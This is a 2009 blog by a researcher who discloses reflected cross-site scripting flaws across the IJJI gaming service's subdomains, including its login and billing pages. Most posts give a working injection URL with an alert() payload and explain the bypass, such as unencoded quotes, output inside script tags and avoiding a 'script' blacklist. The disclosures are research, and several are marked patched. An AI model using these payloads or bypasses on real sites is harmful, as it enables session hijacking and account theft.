One Month Later..

15 September 2009

It’s been a month since I published my last vulnerability, and IJJI has made several positive changes to their code (specifically with callback scripts).

The following posts have been patched due correctly encoding brackets, quotes, or blacklisting non-alphanumeric characters:

The following post has been patched thanks to the use of the isNaN function over eval:

The following posts have been updated:

Updated the src attribute to call the event onError in Firefox 3.5.

Updated without the use of quotes.

IJJI has now published Holybeast Online, and begun the open-beta for Soul of the Ultimate Nation (S.U.N). They’ve also pushed their new launcher, Reactor, an extended web-wrapper for organising installed games. Steam anyone?

I’ve updated the categories for now, but I shall expect them to be outdated as this blog becomes forgotten about.

Oh, one last thing: Pre-Game Start ;)

Posted in x1nixmzeng | Comments Off

Global Pre-Download [BONUS2]

15 August 2009

Type: Non-persistent
Criteria: None

This final disclosure draws the series of predownload.nhn vulnerabilities to a close.

An actual explaination is due at a later date, where I will wrap this this blog up and open to feedback.

10) Miscellaneous

http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

11) Bulletin Board System

http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

12) Channel

http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

13) Billing

http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

14) HTTPS Billing

https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

15) Facebook

http://facebook.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

16) Message

http://message.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

17) Avatar

http://avatar.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

Posted in patched, x1nixmzeng | Comments Off

Global Pre-Download [BONUS]

14 August 2009

Type: Non-persistent
Criteria: None

The penultimate post in this experimental blog, disclosing 9 seperate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.

1) Top-level

http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

2) www2

http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

3) Huxley:The Dystopia

http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

4) Soldier Front

http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

5) GunZ

http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

6) Drift City

http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

7) Lunia

http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

8) Game

http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

9) Events

http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

This script has a greater advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.

Posted in patched, x1nixmzeng | Comments Off

Global Pre-Launch [BONUS2]

13 August 2009

Type: Non-persistent
Criteria: None

This post is a continuation of the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script.

10) Miscellaneous

http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

11) Bulletin Board System

http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

12) Channel

http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

13) Billing

http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

14) HTTPS Billing

https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

15) Facebook

http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

16) Message

http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

17) Avatar

http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:

If the user is authenticated, they will be alerted:

This channel does not exist

If the user is not authenticated, then they will be redirected to login (there is a timed delay on with Firefox).

Posted in non-persistent, x1nixmzeng | Comments Off

Global Pre-Launch [BONUS]

12 August 2009

Type: Non-persistent
Criteria: None

Thus begins the final 4 days of this experiment; hopefully ending with a bang.

This post will disclose 9 seperate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.

1) Top-level

http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

2) www2

http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

3) Huxley:The Dystopia

http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

4) Soldier Front

http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

5) GunZ

http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

6) Drift City

http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

7) Lunia

http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

8) Game

http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

9) Events

http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

They clearly all exploit the same parameter, as they share the same script. I plan to writeup better descriptions in a seperate post.

Posted in non-persistent, x1nixmzeng | Comments Off

Login Next URL

11 August 2009

Type: Non-persistent
Criteria: None

http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);//

There is no criteria, as you can be logged in or not – though if you are, you will be logged out (naturally).

In a nutshell, double quotes are encoded, but single ones are not – and also, the nextURL parameter is carelessly outputted straight into a script tag (for the loginENMLoginForm function).

Posted in patched, x1nixmzeng | Comments Off

Game Screenshot

10 August 2009

Type: Non-persistent
Criteria: None

http://game.ijji.com/sshot.nhn?gameId=u_gunz&index=0);alert(/xss/.source

Fairly old method, updated without the need for single or double quotes for the “xss” string (which are now correctly encoded before output). The variable index still doesn’t strip anything which doesn’t resemble an integer.

Posted in non-persistent, x1nixmzeng | Comments Off

Blog Status

10 August 2009

I started this blog as an experiment, and as a small sideline challenge (to discover a vulnerability on the IJJI site every day for a month), but as I look back, I seem to have made numerous errors.

Each post should be focusing on a different script. My early posts focused on polls, which all used the same script:

http://event.ijji.com/poll.nhn

The only difference in each disclosure was the poll name, which did return different data, but shouldn’t have been posted seperately, as it wasn’t a new script.

Scripts on different subdomains are allowed though, as subdomains are seen a different hostnames according to the same origin policy (which is important for an attack).

Posted in x1nixmzeng | Comments Off

BBS Forum View

9 August 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&page=&id=999999999&ordering=%22;alert(%27xss%27);//

Note that the exploit will execute twice.

Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the variable id is now very picky about what data has been supplied. However, this exploit will still accept an id which doesn’t yet exist (less data is returned when it doesn’t exist, but this exploit will still work or without a valid id variable).

The XSS relies on the value of ordering, which is blindingly printed into the main page, and in both instances, directly into a SCRIPT tag (the phrase “script” has been blacklisted from all scripts, which is why I’ve been using an alternative).

Posted in patched, x1nixmzeng | Comments Off

HTTPS Add G Coin

8 August 2009

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22

Another vulnerability from the paymentprocess.nhn script. The RURL (referral URL) variable doesn’t check if the address supplied is valid or care to strip any characters. A particularly lazy example.

Outputted to a hidden input tag (REQ_RURL), there are no visible changes to the end-user.

Posted in non-persistent, x1nixmzeng | Comments Off

« Older posts
Follow

Get every new post delivered to your Inbox.